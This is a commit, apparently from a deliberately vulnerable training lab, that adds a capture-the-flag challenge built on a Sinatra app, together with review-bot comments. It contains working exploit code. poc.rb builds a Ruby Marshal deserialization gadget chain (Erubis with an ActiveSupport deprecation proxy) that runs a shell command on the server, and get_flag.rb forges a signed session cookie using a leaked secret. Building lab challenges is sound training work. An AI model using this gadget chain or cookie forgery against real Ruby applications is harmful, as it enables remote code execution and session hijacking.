Add 6 of Clubs
This commit is contained in:
parent
129119ac97
commit
5ba1a36fd3
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
File diff suppressed because one or more lines are too long
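--- a/resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
+++ b/resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+#
+# This will check our vulnerable app to see if it's vulnerable or not.
+# It does so by predicting the hash in the cookie.
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+require 'base64'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+cli = Net::HTTP.new('172.28.128.3', 8181)
+req = Net::HTTP::Get.new('/')
+res = cli.request(req)
+cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
+data, hash = cookie.split('--')
+obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
+puts "[*] Found data: #{obj}"
+puts "[*] Found hash: #{hash}"
+puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
+expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
+puts "[*] Predicted hash: #{expected_hash}"
+
+if expected_hash == hash
+puts "[*] Yay! we can predict the hash. The server is vulnerable."
+end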
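Review bot: `Marshal.load` on the `obj =` line deserialises the cookie blob the server returned before its HMAC has been checked, and the check itself never needs the object: the `expected_hash` line computes the digest over `CGI.unescape(data)`, not over `obj`. The load can be dropped, or moved below the `expected_hash == hash` comparison so only a payload whose signature matched is ever deserialised. Separately, when the `Set-Cookie` header carries no `_metasploitable` value the `|| ''` fallback leaves `data` nil and `CGI.unescape(data)` dies with a bare `NoMethodError`; an explicit `abort '[-] No _metasploitable cookie in response' unless data && hash` after the `split('--')` line gives a readable failure. A missing `Set-Cookie` header fails the same way on `.scan`; `res['Set-Cookie'].to_s.scan(...)` covers that case.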
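--- a/resources/flags/linux_flags/6_of_clubs/get_flag.rb
+++ b/resources/flags/linux_flags/6_of_clubs/get_flag.rb
@@ -0,0 +1,48 @@
+#!/usr/bin/env ruby
+
+#
+# This PoC will inject Ruby code in our vulnerable app.
+# It will run the system command "id", and save the output in /tmp/your_id.txt
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+require 'base64'
+require 'digest'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+http = Net::HTTP.new('172.28.128.3', 8181)
+req = Net::HTTP::Get.new('/')
+res = http.request(req)
+cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
+data, hash = cookie.split('--')
+obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
+sid = obj['session_id']
+puts "[*] Obtained session ID: #{sid}"
+
+puts "[*] Using stolen SECRET: #{SECRET}"
+puts "[*] Modifying _metasploitable cookie to 'six of clubs'"
+data = { 'session_id' => sid, '_metasploitable' => "six of clubs" }
+dump = [ Marshal.dump(data) ].pack('m')
+hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
+cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
+
+req = Net::HTTP::Get.new('/flag')
+req['Cookie'] = cookie
+res = http.request(req)
+
+File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) }
+md5 = Digest::MD5.hexdigest(res.body)
+puts "[*] 6_of_clubs.png downloaded."
+puts "[*] 6 of Clubs MD5: #{md5}"
+
+=begin
+$ ruby get_flag.rb
+[*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752
+[*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f
+[*] Modifying _metasploitable cookie to 'six of clubs'
+[*] 6_of_clubs.png downloaded.
+[*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b
+=end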
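Review bot: The header comment of get_flag.rb is copied from poc.rb and describes code injection that writes /tmp/your_id.txt, which this script does not do; what it does is re-sign a session cookie with `SECRET` and fetch `/flag`. Suggest replacing those two comment lines with `# This PoC re-signs the _metasploitable session cookie with the known SECRET` / `# and downloads /flag to 6_of_clubs.png, printing its MD5.` The download is also written and hashed without looking at the response, so a non-200 reply or an HTML error page still lands in `6_of_clubs.png` and gets a plausible-looking MD5; `abort "[-] /flag returned #{res.code}" unless res.is_a?(Net::HTTPSuccess)` before the `File.open` line avoids a misleading success message. As in check_sinatra_vuln.rb, `Marshal.load` runs on the server's unverified cookie just to read `session_id`, and a missing cookie turns into a bare `NoMethodError` on `CGI.unescape(data)`.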
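--- a/resources/flags/linux_flags/6_of_clubs/poc.rb
+++ b/resources/flags/linux_flags/6_of_clubs/poc.rb
@@ -0,0 +1,34 @@
+#!/usr/bin/env ruby
+
+#
+# This PoC will inject Ruby code in our vulnerable app.
+# It will run the system command "id", and save the output in /tmp/your_id.txt
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+module Erubis;class Eruby;end;end
+module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
+
+erubis = Erubis::Eruby.allocate
+erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
+proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
+proxy.instance_variable_set :@instance, erubis
+proxy.instance_variable_set :@method, :result
+proxy.instance_variable_set :@var, "@result"
+
+session = { 'session_id' => '', 'exploit' => proxy }
+
+dump = [ Marshal.dump(session) ].pack('m')
+hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
+cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
+
+http = Net::HTTP.new('127.0.0.1', 8181)
+req = Net::HTTP::Get.new('/')
+req['Cookie'] = cookie
+res = http.request(req)
+puts "Done"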
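Review bot: `res` on the `res = http.request(req)` line of poc.rb is assigned but never read, and `puts "Done"` prints regardless of what the server answered, so a request that reached the wrong host or drew a 4xx/5xx still reports completion; `puts "[*] Server responded #{res.code}"` in place of `puts "Done"` makes the outcome observable. The target host here is `'127.0.0.1'` while check_sinatra_vuln.rb and get_flag.rb in the same commit use `'172.28.128.3'`; the three scripts would be easier to run together if host and port came from one place such as `ARGV` or an environment variable instead of being hard-coded per file. The single-line `module Erubis;class Eruby;end;end` and `module ActiveSupport;...` stubs are hard to read and would be clearer written out on separate lines per the project's usual Ruby style.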
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 419 KiB |